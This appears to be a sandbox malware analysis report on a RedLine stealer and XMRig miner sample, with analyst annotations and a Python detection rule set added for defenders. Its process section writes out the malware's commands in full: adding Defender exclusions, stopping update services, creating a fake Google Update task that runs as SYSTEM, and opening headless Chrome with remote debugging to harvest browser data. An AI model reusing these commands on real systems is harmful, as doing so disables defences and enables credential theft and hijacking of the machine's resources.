Malware Analysis Report

2025-01-18 09:03

Sample ID 230811-agg9gahg23
Target 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp
SHA256 e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607
Tags
logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e1ba9b1567985575021e7c3acff4044e6d17164d32391c848fe8290e40249607

Threat Level: Known bad

The file 2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

logsdiller cloud (tg: @logsdillabot) redline evasion infostealer spyware stealer themida xmrig miner

xmrig

Redline family

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Modifies system certificate store

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-11 00:10

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-11 00:10

Reported

2023-08-11 00:13

Platform

win7-20230712-en

Max time kernel

58s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1768 created 1352 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1076 set thread context of 2116 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Note: read together with the WriteProcessMemory rows from PID 1076 to 2116, this is process hollowing: cli.exe starts the .NET host AppLaunch.exe with no arguments, writes its payload into the new process and redirects the main thread to it, so the stealer runs under a Microsoft-signed image.

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (binary certificate data omitted) C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary certificate data omitted) C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A

Note: CABD2A79A1076A31F21D253635CB039D4329A5E8 is the SHA-1 thumbprint of ISRG Root X1 and DAC9024F54D8F6DF94935FB1732638CA6AD77C13 that of DST Root CA X3, i.e. the Let's Encrypt root chain. Together with the HTTP request to apps.identrust.com in the Network section (the AIA location of the cross-signed ISRG Root X1) and the Cab*.tmp/Tar*.tmp files under Temp that CryptoAPI leaves when it fetches and unpacks root updates, these writes are consistent with Windows building and caching the chain for the TLS download from transfer.sh, not with the sample installing a root of its own. Do not use this signature as a standalone indicator for this sample.

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3008 wrote to memory of 3064 (x4) N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 3008 wrote to memory of 1076 (x4) N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 3064 wrote to memory of 1768 (x4) N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1076 wrote to memory of 2116 (x9) N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3008 wrote to memory of 2652 (x4) N/A C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 1076 wrote to memory of 1944 (x4) N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2652 wrote to memory of 976 (x4) N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 1544 (x3) N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 976 wrote to memory of 2200 (x28) N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 108

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=54984 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef5c49758,0x7fef5c49768,0x7fef5c49778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=800 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1216 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=54984 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1588 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1916 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2456 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2008 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2684 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=54984 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2788 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {65B68D71-3ABA-4F35-8E6B-02DEE13D6A04} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2752 --field-trial-handle=1004,i,10899111363063097909,7730755134087179627,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe
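
The process list above is the whole miner-loader playbook in one place: a Defender exclusion over the user profile and Program Files, the Windows Update and BITS services stopped, standby and hibernate timeouts zeroed, a task named GoogleUpdateTaskMachineQC that runs an updater.exe outside the real Google Update directory as SYSTEM, a headless Chrome with --remote-debugging-port pointed at a copied profile ("User DataSGDF5"), and AppLaunch.exe started with no arguments by a binary in Temp. The Python below is an added example, not part of this report, that turns those command lines into rules and runs them over an event list constructed from this page. Parent images are filled in only where the report records them (the SetThreadContext and WriteProcessMemory rows) and are None elsewhere, the notepad line is a constructed benign control, and the Google Update rule assumes that legitimate GoogleUpdateTaskMachine* tasks always run a binary under a \Google\Update\ directory.

```python
"""Rule pass over the command lines in this report's Processes section (added example)."""
import re

# Windows Update / BITS services; stopping all of them at once keeps the host
# from patching or rebooting under the miner.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

# (parent image, command line). Command lines are the report's; the parent is
# given only where the report records it, otherwise None (assumption: unknown).
SAMPLE_EVENTS = [
    (r"C:\Users\Admin\AppData\Local\Temp\cli.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"'),
    (r"C:\Users\Admin\AppData\Local\Temp\cc.exe",
     r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=54984 '
     r'--headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataSGDF5" '
     r'--profile-directory="Default"'),
    (None, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
           r"-ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    (None, r"C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc "
           r"& sc stop wuauserv & sc stop bits & sc stop dosvc"),
    (None, r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 "
           r"& powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 "
           r"& powercfg /x -standby-timeout-dc 0"),
    (None, r'''"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System '''
           r'''/tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"'''),
    (None, r'C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"'),
    # Constructed benign control, not from the report.
    (r"C:\Windows\explorer.exe", r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\notes.txt'),
]


def _schtasks_arg(cmdline, flag):
    """Value after a schtasks flag such as /tn or /tr, outer quotes removed."""
    m = re.search(re.escape(flag) + r"""\s+("[^"]*"|'[^']*'|\S+)""", cmdline, re.IGNORECASE)
    return m.group(1).strip("\"'") if m else None


def _split_image(cmdline):
    """Split a Windows command line into (image path, remaining arguments)."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))\s*(.*)$', cmdline, re.DOTALL)
    return (m.group(1) or m.group(2), m.group(3)) if m else ("", "")


def classify(parent, cmdline):
    """Return the rule names that one (parent image, command line) pair triggers."""
    hits = []
    low = cmdline.lower()
    parent_low = (parent or "").lower()
    image, args = _split_image(cmdline)

    # Defender exclusion covering the whole profile and Program Files.
    if "add-mppreference" in low and "-exclusionpath" in low:
        hits.append("defender_exclusion")

    # Update-related services stopped in one command (sc stop X & sc stop Y ...).
    stopped = {s.lower() for s in re.findall(r"sc\s+stop\s+(\S+)", cmdline, re.IGNORECASE)}
    if stopped & UPDATE_SERVICES:
        hits.append("update_services_stopped")

    # Standby/hibernate timeouts set to 0 so the miner is never interrupted.
    if re.search(r"powercfg\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0", cmdline, re.IGNORECASE):
        hits.append("power_timeouts_disabled")

    # Task named like Google Update whose action lives outside \Google\Update\ (assumed legit path).
    if "schtasks" in low and "/create" in low:
        tn = (_schtasks_arg(cmdline, "/tn") or "").lower()
        tr = (_schtasks_arg(cmdline, "/tr") or "").lower()
        if tn.startswith("googleupdatetaskmachine") and "\\google\\update\\" not in tr:
            hits.append("masquerading_task")
        if re.search(r"/ru\s+'?system'?", cmdline, re.IGNORECASE) and re.search(r"/rl\s+highest", cmdline, re.IGNORECASE):
            hits.append("system_task_created")

    # Headless Chrome with the DevTools port open, usually against a copied profile.
    if "--remote-debugging-port" in low and "--headless" in low:
        hits.append("headless_browser_devtools")
        m = re.search(r'--user-data-dir=(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
        udd = ((m.group(1) or m.group(2)) if m else "").lower()
        if udd and not udd.endswith("\\google\\chrome\\user data"):
            hits.append("cloned_browser_profile")

    # .NET host started with no assembly argument by something in %TEMP%: hollowing target.
    if image.lower().endswith("\\applaunch.exe") and not args.strip() and "\\appdata\\local\\temp\\" in parent_low:
        hits.append("hollowed_dotnet_host")

    return hits


def scan(events):
    """Run classify() over every event; returns {rule_name: [command lines that hit]}."""
    findings = {}
    for parent, cmdline in events:
        for rule in classify(parent, cmdline):
            findings.setdefault(rule, []).append(cmdline)
    return findings


if __name__ == "__main__":
    for rule, lines in sorted(scan(SAMPLE_EVENTS).items()):
        print(f"{rule}: {len(lines)} hit(s)")
```

Run as a script it prints one line per rule with the hit count; in practice feed it (ParentImage, CommandLine) pairs from Sysmon event 1 instead of SAMPLE_EVENTS. The hollowing rule is the reason the event carries the parent: AppLaunch.exe with no arguments is only interesting when a user-writable directory launched it.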

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.162:443 googleads.g.doubleclick.net tcp
NL 142.250.179.162:443 googleads.g.doubleclick.net udp
NL 142.251.36.54:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp (x19)
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp (x40)

Files

memory/3008-54-0x0000000000AD0000-0x0000000000B04000-memory.dmp

memory/3008-55-0x00000000747E0000-0x0000000074ECE000-memory.dmp

memory/3008-56-0x00000000002F0000-0x00000000002F6000-memory.dmp

memory/3008-57-0x00000000048F0000-0x0000000004930000-memory.dmp

memory/3008-58-0x00000000747E0000-0x0000000074ECE000-memory.dmp

memory/3008-59-0x00000000048F0000-0x0000000004930000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabA96B.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarAA29.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/3008-155-0x000000000C350000-0x000000000C5DB000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
